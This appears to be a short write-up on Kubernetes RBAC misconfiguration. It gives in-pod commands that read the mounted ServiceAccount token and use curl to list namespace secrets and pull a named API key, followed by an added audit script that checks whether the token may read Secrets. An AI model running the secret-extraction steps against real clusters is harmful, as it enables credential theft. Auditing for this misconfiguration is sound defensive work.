RBAC least privilege misconfiguration

  • Because Kubernetes by default stores all secrets, tokens and service-account information under one fixed directory, you can go straight to that directory and look for sensitive information:
cd /var/run/secrets/kubernetes.io/serviceaccount/


  • To point at the internal API server hostname, we can derive it from the environment variable
export APISERVER=https://${KUBERNETES_SERVICE_HOST}
  • Set the path of the ServiceAccount token
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
  • Set the namespace value
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
  • Read the ServiceAccount token
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
  • Point at the ca.crt path so that we can use it when querying with curl
export CACERT=${SERVICEACCOUNT}/ca.crt
  • Now we can explore the Kubernetes API using the token and constructed queries
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api


  • To query the secrets available in the default namespace, run the following command
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/secrets


  • Query the secrets specific to a namespace
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets
  • Retrieve the k8svaultapikey value from the secrets
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets | grep k8svaultapikey

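A defender-side check for the misconfiguration the steps above walk through, added here as an example that is not part of the original post: run inside a pod, it asks the API server through a SelfSubjectAccessReview whether the mounted ServiceAccount token may get, list or watch Secrets in its own namespace, so over-privileged workloads can be found before anyone reads their secrets. It reuses the in-pod paths and environment variables from the post; the function names are my own.

```shell
#!/bin/sh
# Added audit example (not from the original post). Uses the same mounted
# ServiceAccount directory and KUBERNETES_SERVICE_HOST variable as above.
SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount

# Build the JSON body of a SelfSubjectAccessReview for (namespace, verb, resource).
build_ssar_body() {
  printf '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectAccessReview","spec":{"resourceAttributes":{"namespace":"%s","verb":"%s","resource":"%s"}}}' "$1" "$2" "$3"
}

# Return 0 if a SelfSubjectAccessReview response says the action is allowed.
# Handles both compact and pretty-printed JSON (the API server pretty-prints for curl).
ssar_allowed() {
  printf '%s' "$1" | grep -q '"allowed": *true'
}

# POST the review to the API server with the mounted token; prints the raw response.
ssar_query() {
  curl -sS --cacert "${SERVICEACCOUNT}/ca.crt" \
    --header "Authorization: Bearer $(cat "${SERVICEACCOUNT}/token")" \
    --header "Content-Type: application/json" \
    -X POST --data "$(build_ssar_body "$1" "$2" "$3")" \
    "https://${KUBERNETES_SERVICE_HOST}/apis/authorization.k8s.io/v1/selfsubjectaccessreviews"
}

# Check every verb that exposes Secret contents; print one line per verb and
# return 1 if any is allowed, so the script can fail a pipeline or compliance job.
audit_secret_access() {
  ns=$1
  finding=0
  for verb in get list watch; do
    resp=$(ssar_query "$ns" "$verb" secrets)
    if ssar_allowed "$resp"; then
      echo "FINDING: service account may '$verb' secrets in namespace '$ns'"
      finding=1
    else
      echo "ok: '$verb' secrets denied in namespace '$ns'"
    fi
  done
  return $finding
}

# Only talk to a real API server when running inside a pod with a mounted token.
if [ -n "${KUBERNETES_SERVICE_HOST:-}" ] && [ -r "${SERVICEACCOUNT}/token" ]; then
  audit_secret_access "$(cat "${SERVICEACCOUNT}/namespace")"
fi
```

A pod whose ServiceAccount has no Role granting secrets access should report all three verbs as denied; any FINDING line means the RoleBinding (or a default binding such as one to cluster-admin) needs to be narrowed.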